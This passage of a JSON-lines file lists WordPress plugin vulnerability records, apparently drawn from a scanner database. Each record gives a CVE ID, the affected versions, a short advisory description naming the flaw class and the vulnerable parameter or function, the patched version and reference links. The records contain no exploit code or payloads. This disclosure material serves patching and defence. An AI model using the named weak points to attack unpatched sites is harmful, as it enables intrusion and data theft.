version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-addons-for-elementor\\\/trunk\\\/includes\\\/widgets-manager\\\/widgets\\\/class-responsive-addons-for-elementor-icon-box.php#L2499\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-addons-for-elementor\\\/trunk\\\/includes\\\/widgets-manager\\\/widgets\\\/class-responsive-addons-for-elementor-icon-box.php#L2499\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261241\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261241\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3263280\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3263280\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5ace7fb-530e-4a69-bbf7-e2c66491dd75?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5ace7fb-530e-4a69-bbf7-e2c66491dd75?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2228","slug":"responsive-addons-for-elementor","versionImpact":"1.6.8","versionEndExcluding":"1.6.9","description":"The Responsive Addons for Elementor \u2013 Free Elementor Addons Plugin and Elementor Templates plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.6.8 the 'register_user' function. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive data including usernames and passwords of any users who register via the Edit Login | Registration Form widget, as long as that user opens the email notification for successful registration.","recommendation":"Update to version 1.6.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-addons-for-elementor\\\/trunk\\\/includes\\\/modules-manager\\\/login-register\\\/class-login-register.php#L369\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-addons-for-elementor\\\/trunk\\\/includes\\\/modules-manager\\\/login-register\\\/class-login-register.php#L369\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261241\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261241\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/659ef2e8-589c-4901-88ce-1d674c056ece?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/659ef2e8-589c-4901-88ce-1d674c056ece?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2580","slug":"ai-engine","versionEndExcluding":"1.6.83","description":"The AI Engine WordPress plugin before 1.6.83 does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example, in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7ee1efb1-9969-40b2-8ab2-ea427091bbd8\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7ee1efb1-9969-40b2-8ab2-ea427091bbd8\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1119","slug":"simply-schedule-appointments","versionImpact":"1.6.8.5","versionEndExcluding":"1.6.8.7","description":"The Appointment Booking Calendar \u2014 Simply Schedule Appointments Booking Plugin plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.6.8.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 1.6.8.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250719\\\/simply-schedule-appointments\\\/trunk\\\/booking-app-new\\\/page-appointment-edit.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250719\\\/simply-schedule-appointments\\\/trunk\\\/booking-app-new\\\/page-appointment-edit.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1be557db-daa8-4d86-819a-462f29da884b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1be557db-daa8-4d86-819a-462f29da884b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13431","slug":"simply-schedule-appointments","versionImpact":"1.6.8.3","versionEndExcluding":"1.6.8.5","description":"The Appointment Booking Calendar \u2014 Simply Schedule Appointments Booking Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the accent_color and background parameter in all versions up to, and including, 1.6.8.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.6.8.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simply-schedule-appointments\\\/trunk\\\/booking-app-new\\\/iframe-inner.php#L182\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simply-schedule-appointments\\\/trunk\\\/booking-app-new\\\/iframe-inner.php#L182\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simply-schedule-appointments\\\/trunk\\\/booking-app-new\\\/iframe-inner.php#L189\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simply-schedule-appointments\\\/trunk\\\/booking-app-new\\\/iframe-inner.php#L189\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246760\\\/simply-schedule-appointments\\\/trunk\\\/booking-app-new\\\/iframe-inner.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246760\\\/simply-schedule-appointments\\\/trunk\\\/booking-app-new\\\/iframe-inner.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6e3e5dd-b9f1-4d24-98cc-b6ab319434e4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6e3e5dd-b9f1-4d24-98cc-b6ab319434e4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1505","slug":"woocommerce-ajax-filters","versionImpact":"1.6.8.1","versionEndExcluding":"1.6.8.2","description":"The Advanced AJAX Product Filters plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'nonce' parameter in all versions up to, and including, 1.6.8.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.6.8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3245830\\\/woocommerce-ajax-filters\\\/trunk\\\/includes\\\/wizard.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3245830\\\/woocommerce-ajax-filters\\\/trunk\\\/includes\\\/wizard.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94b289bf-0ef1-47d1-98bd-8f7bb753c2bc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94b289bf-0ef1-47d1-98bd-8f7bb753c2bc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-43935","slug":"delicious-recipes","versionImpact":"1.6.7","versionEndExcluding":"1.6.8","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in WP Delicious Delicious Recipes \u2013 WordPress Recipe Plugin allows Stored XSS.This issue affects Delicious Recipes \u2013 WordPress Recipe Plugin: from n\/a through 1.6.7.","recommendation":"Update to version 1.6.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/delicious-recipes\\\/wordpress-wp-delicious-recipe-plugin-for-food-bloggers-formerly-delicious-recipes-plugin-1-6-7-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/delicious-recipes\\\/wordpress-wp-delicious-recipe-plugin-for-food-bloggers-formerly-delicious-recipes-plugin-1-6-7-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2749","slug":"vikbooking","versionImpact":"1.6.7","versionEndExcluding":"1.6.8","description":"The VikBooking Hotel Booking Engine & PMS WordPress plugin before 1.6.8's access control mechanism fails to properly restrict access to its settings, permitting any users that can access a menu to manipulate requests and perform unauthorized actions such as editing, renaming or deleting (categories for example) despite initial settings prohibiting such access. This vulnerability resembles broken access control, enabling unauthorized users to modify critical VikBooking Hotel Booking Engine & PMS WordPress plugin before 1.6.8 configurations.","recommendation":"Update to version 1.6.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c0640d3a-80b3-4cad-a3cf-fb5d86558e91\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c0640d3a-80b3-4cad-a3cf-fb5d86558e91\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2441","slug":"vikbooking","versionImpact":"1.6.7","versionEndExcluding":"1.6.8","description":"The VikBooking Hotel Booking Engine & PMS WordPress plugin before 1.6.8 allows direct access to menus, allowing an authenticated user with subscriber privileges or above, to bypass authorization and access settings of the VikBooking Hotel Booking Engine & PMS WordPress plugin before 1.6.8's they shouldn't be allowed to.","recommendation":"Update to version 1.6.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9647e273-5724-4a02-868d-9b79f4bb2b79\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9647e273-5724-4a02-868d-9b79f4bb2b79\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2006","slug":"post-grid-carousel-ultimate","versionImpact":"1.6.7","versionEndExcluding":"1.6.8","description":"The Post Grid, Slider & Carousel Ultimate \u2013 with Shortcode, Gutenberg Block & Elementor Widget plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.6.7 via deserialization of untrusted input in the outpost_shortcode_metabox_markup function. This makes it possible for authenticated attackers, with contributor-level access and above, to inject a PHP Object. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 1.6.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8cf1b234-862b-41a0-ab63-a986f8023613?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8cf1b234-862b-41a0-ab63-a986f8023613?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-grid-carousel-ultimate\\\/trunk\\\/includes\\\/classes\\\/metabox.php#L43\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-grid-carousel-ultimate\\\/trunk\\\/includes\\\/classes\\\/metabox.php#L43\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/post-grid-carousel-ultimate\\\/tags\\\/1.6.7&old=3045923&new_path=\\\/post-grid-carousel-ultimate\\\/tags\\\/1.6.8&new=3045923&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/post-grid-carousel-ultimate\\\/tags\\\/1.6.7&old=3045923&new_path=\\\/post-grid-carousel-ultimate\\\/tags\\\/1.6.8&new=3045923&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7644","slug":"pixel-gallery","versionImpact":"1.6.7","versionEndExcluding":"1.6.8","description":"The Pixel Gallery Addons for Elementor \u2013 Easy Grid, Creative Gallery, Drag and Drop Grid, Custom Grid Layout, Portfolio Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via URLs in all widgets in all versions up to, and including, 1.6.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.6.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3328206%40pixel-gallery&new=3328206%40pixel-gallery&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3328206%40pixel-gallery&new=3328206%40pixel-gallery&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a3fbf26b-c7d8-4c44-b3c1-c4e028465a9e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a3fbf26b-c7d8-4c44-b3c1-c4e028465a9e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3345","slug":"learning-management-system","versionEndExcluding":"1.6.8","description":"The LMS by Masteriyo WordPress plugin before 1.6.8 does not properly safeguard sensitive user information, such as other users' email addresses, making it possible for any student to leak them via some of the plugin's REST API endpoints.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0d07423e-98d2-43a3-824d-562747a3d65a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0d07423e-98d2-43a3-824d-562747a3d65a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13508","slug":"booking-package","versionImpact":"1.6.72","versionEndExcluding":"1.6.73","description":"The Booking Package plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the locale parameter in all versions up to, and including, 1.6.72 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.6.73, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking-package\\\/tags\\\/1.6.71\\\/index.php#L1714\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking-package\\\/tags\\\/1.6.71\\\/index.php#L1714\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/212e8f84-22a9-4b9e-b440-280f8569846f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/212e8f84-22a9-4b9e-b440-280f8569846f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7877","slug":"simply-schedule-appointments","versionImpact":"1.6.7.53","versionEndExcluding":"1.6.7.55","description":"The Appointment Booking Calendar \u2014 Simply Schedule Appointments Booking Plugin WordPress plugin before 1.6.7.55 does not sanitise and escape some of its Notification settings, which could allow high-privilege users such as admins to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed.","recommendation":"Update to version 1.6.7.55, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fbec3738-2135-458d-be25-1ffb00e6deb6\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fbec3738-2135-458d-be25-1ffb00e6deb6\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7876","slug":"simply-schedule-appointments","versionImpact":"1.6.7.53","versionEndExcluding":"1.6.7.55","description":"The Appointment Booking Calendar \u2014 Simply Schedule Appointments Booking Plugin WordPress plugin before 1.6.7.55 does not sanitise and escape some of its Appointment Type settings, which could allow high-privilege users such as admins to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed.","recommendation":"Update to version 1.6.7.55, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fffe862f-5bf0-4a05-9d32-caff0bfdb860\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fffe862f-5bf0-4a05-9d32-caff0bfdb860\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7129","slug":"simply-schedule-appointments","versionImpact":"1.6.7.42","versionEndExcluding":"1.6.7.43","description":"The Appointment Booking Calendar \u2014 Simply Schedule Appointments Booking Plugin WordPress plugin before 1.6.7.43 does not escape template syntax provided via user input, leading to Twig Template Injection, which can be further exploited to achieve remote code execution by high-privilege users such as admins.","recommendation":"Update to version 1.6.7.43, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/00ad9b1a-97a5-425f-841e-ea48f72ecda4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/00ad9b1a-97a5-425f-841e-ea48f72ecda4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4288","slug":"simply-schedule-appointments","versionImpact":"1.6.7.14","versionEndExcluding":"1.6.7.18","description":"The Appointment Booking Calendar \u2014 Simply Schedule Appointments Booking Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018link\u2019 parameter in versions up to, and including, 1.6.7.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.6.7.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/84262b4a-a662-4aaf-9eae-f5cca8f6cd06?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/84262b4a-a662-4aaf-9eae-f5cca8f6cd06?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simply-schedule-appointments\\\/trunk\\\/includes\\\/class-shortcodes.php#L677\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simply-schedule-appointments\\\/trunk\\\/includes\\\/class-shortcodes.php#L677\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3087297\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3087297\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4279","slug":"user-activity-log","versionEndExcluding":"1.6.7","description":"The User Activity Log WordPress plugin before 1.6.7 retrieves client IP addresses from potentially untrusted headers, allowing an attacker to manipulate their value. This may be used to hide the source of malicious traffic.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2bd2579e-b383-4d12-b207-6fc32cfb82bc\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2bd2579e-b383-4d12-b207-6fc32cfb82bc\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0820","slug":"user-role","versionEndExcluding":"1.6.7","description":"The User Role by BestWebSoft WordPress plugin before 1.6.7 does not protect against CSRF in requests to update role capabilities, leading to arbitrary privilege escalation of any role.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b93d9f9d-0fd9-49b8-b465-d32b95351912\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b93d9f9d-0fd9-49b8-b465-d32b95351912\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11324","slug":"accounting-for-woocommerce","versionImpact":"1.6.6","versionEndExcluding":"1.6.7","description":"The Accounting for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.6.6. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.6.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accounting-for-woocommerce\\\/tags\\\/stable\\\/views\\\/export.php#L46\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accounting-for-woocommerce\\\/tags\\\/stable\\\/views\\\/export.php#L46\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3201725\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3201725\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f34b7518-5cb3-4b4e-8b18-927c08c045f7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f34b7518-5cb3-4b4e-8b18-927c08c045f7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0559","slug":"enhanced-text-widget","versionImpact":"1.6.5","versionEndExcluding":"1.6.6","description":"The Enhanced Text Widget WordPress plugin before 1.6.6 does not validate and escape some of its Widget options before outputting them back in attributes, which could allow high-privilege users such as admins to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in a multisite setup).","recommendation":"Update to version 1.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b257daf2-9540-4a0f-a560-54b47d2b913f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b257daf2-9540-4a0f-a560-54b47d2b913f\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2024-0559\\\/\",\"name\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2024-0559\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4269","slug":"user-activity-log","versionEndExcluding":"1.6.6","description":"The User Activity Log WordPress plugin before 1.6.6 lacks proper authorisation when exporting its activity logs, allowing any authenticated user, such as a subscriber, to perform this action and retrieve PII such as email addresses.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/db3e4336-117c-47f2-9b43-2ca115525297\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/db3e4336-117c-47f2-9b43-2ca115525297\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10215","slug":"wpbookit","versionImpact":"1.6.4","versionEndExcluding":"1.6.6","description":"The WPBookit plugin for WordPress is vulnerable to Arbitrary User Password Change in versions up to, and including, 1.6.4. This is due to the plugin providing user-controlled access to objects, letting a user bypass authorization and access system resources. This makes it possible for unauthenticated attackers to change user passwords and potentially take over administrator accounts.","recommendation":"Update to version 1.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/documentation.iqonic.design\\\/wpbookit\\\/versions\\\/change-log\",\"name\":\"https:\\\/\\\/documentation.iqonic.design\\\/wpbookit\\\/versions\\\/change-log\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d23a2b9-8476-4564-a5de-5e6cfc38ce68?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d23a2b9-8476-4564-a5de-5e6cfc38ce68?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11089","slug":"anonymous-restricted-content","versionImpact":"1.6.5","versionEndExcluding":"1.6.6","description":"The Anonymous Restricted Content plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.6.5 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to logged-in users.","recommendation":"Update to version 1.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3191193\\\/anonymous-restricted-content\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3191193\\\/anonymous-restricted-content\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/95a01f44-2356-4ea4-b48e-80e3c6114efa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/95a01f44-2356-4ea4-b48e-80e3c6114efa?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36760","slug":"ocean-extra","versionEndExcluding":"1.6.6","description":"The Ocean Extra plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.6.5. This is due to missing or incorrect nonce validation on the add_core_extensions_bundle_validation() function. This makes it possible for unauthenticated attackers to validate extension bundles via a forged request provided they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2391055%40ocean-extra&new=2391055%40ocean-extra&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2391055%40ocean-extra&new=2391055%40ocean-extra&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb3ef121-13ea-4e42-90c1-1f4bd31ebbcf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb3ef121-13ea-4e42-90c1-1f4bd31ebbcf?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
